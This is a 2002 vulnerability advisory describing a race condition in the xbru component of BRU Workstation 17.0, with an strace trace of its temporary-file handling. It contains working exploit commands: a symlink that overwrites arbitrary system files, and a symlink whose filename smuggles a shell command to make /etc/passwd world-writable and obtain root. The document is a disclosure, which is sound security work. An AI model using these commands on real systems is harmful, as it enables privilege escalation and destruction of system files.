Backup / Restore Utility [BRU] ------------------------------ advisory@prophecy.net.nz - 04/09/02 About: - http://www.tolisgroup.com/ - "BRU Workstation 17.0 Backup & Restore Utility is a functionally-rich backup solution designed for commercial networked systems when the client/server capability of BRU-Pro is more than you need. Available to support a multitude of platforms, BRU Workstation protects data via NFS, AFS, SMB, and NetAtalk mounted filesystems." Problem: - Race condition in xbru component. Versions Tested: - 17.0 (Workstation Edition) Exploit: - Confirmed testing that this vulnerability can be used to clobber any system file: ln -s /file/to/clobber /tmp/xbru_dscheck.dd - Confirmed testing that this vulnerability can be used to obtain root via spybreak's logwatch method (and possibly others): ln -s /etc/log.d/scripts/logfiles/xferlog/'`cd etc;chmod 666 passwd #`' /tmp/xbru_dscheck.dd Notes: - Wait for root to navigate through xbru to 'list archive contents'. (a tape must be present in the tape drive for this to work). Fix: - No response from vendor: (support@tolisgroup.com) Note: This is a new discovery, not the same as: http://online.securityfocus.com/bid/3970 but contained within the same product. Unfortunately it seems that a fix was never released for this previous race condition either. Strace Snippet: [pid 32159] execve("/bin/dd", ["dd", "if=/dev/nst0", "of=/tmp/xbru_dscheck.dd", "bs=32k", "count=1"], [/* 38 vars */]) = 0 [pid 32159] open("/tmp/xbru_dscheck.dd", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 1 <snip> [pid 32151] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0 <snip> [pid 32161] execve("/bin/dd", ["dd", "if=/tmp/xbru_dscheck.dd", "count=1", "bs=216"], [/* 38 vars */]) = 0 [pid 32161] open("/tmp/xbru_dscheck.dd", O_RDONLY|O_LARGEFILE) = 0 <snip> [pid 32162] execve("/bin/bru", ["bru", "-gB", "-b4k", "-f", "/tmp/xbru_dscheck.dd"], [/* 38 vars */]) = 0 [pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0 [pid 32163] execve("/usr/local/xbru/mounttape.tcl", ["/usr/local/xbru/mounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "0"], [/* 39 vars */]) = 0 [pid 32163] execve("/usr/bin/wish", ["/usr/bin/wish", "/usr/local/xbru/mounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "0"], [/* 39 vars */]) = 0 [pid 32162] access("/tmp/xbru_dscheck.dd", F_OK) = 0 [pid 32162] access("/tmp/xbru_dscheck.dd", R_OK) = 0 [pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0 [pid 32162] access("/tmp/xbru_dscheck.dd", R_OK) = 0 [pid 32162] open("/tmp/xbru_dscheck.dd", O_RDONLY|O_LARGEFILE) = 3 [pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0 [pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0 [pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0 [pid 32167] execve("/usr/local/xbru/unmounttape.tcl", ["/usr/local/xbru/unmounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "4"], [/* 39 vars */]) = 0 [pid 32151] lstat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0 [pid 32151] unlink("/tmp/xbru_dscheck.dd") = 0
